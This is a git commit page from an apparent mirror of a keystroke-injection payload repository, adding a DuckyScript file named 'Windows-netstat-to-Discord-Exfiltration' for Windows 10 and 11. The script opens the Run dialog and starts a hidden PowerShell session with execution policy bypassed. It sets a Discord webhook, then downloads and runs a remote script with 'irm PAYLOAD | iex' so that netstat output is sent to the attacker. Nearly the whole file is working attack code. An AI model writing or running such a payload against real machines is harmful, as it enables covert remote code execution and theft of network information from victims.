mirror of https://github.com/hak5/omg-payloads.git
Windows-netstat-to-Discord-Exfiltration
parent
716a6bd80b
commit
5d2c65387b
|
@ -0,0 +1,39 @@
|
|||
REM ###################################################################
|
||||
REM # |
|
||||
REM # Title : Windows-netstat-to-Discord-Exfiltration |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltration |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ###################################################################
|
||||
|
||||
REM Put 1 on the function that you want to active, else 0. Functions available:
|
||||
REM - default (simple 'netstat' command)
|
||||
REM - routing_table $r
|
||||
REM - listening_canonical $lc
|
||||
REM - listening_numerical $ln
|
||||
REM - all_canonical $ac
|
||||
REM - all_numerical $an
|
||||
REM - offload ot
|
||||
REM - proto $p "<protocol>"
|
||||
REM - - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
|
||||
|
||||
REM Requirements: Internet connection
|
||||
REM
|
||||
|
||||
REM REQUIRED - Provide your Discord WEBHOOK
|
||||
DEFINE WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token>
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 250
|
||||
DELETE
|
||||
STRING powershell -w h -ep bypass $discord='
|
||||
|
||||
STRING WEBHOOK
|
||||
|
||||
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
|
||||
DEFINE PAYLOAD example.com
|
||||
STRING ';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm PAYLOAD | iex
|
||||
ENTER
|
Loading…
Reference in New Issue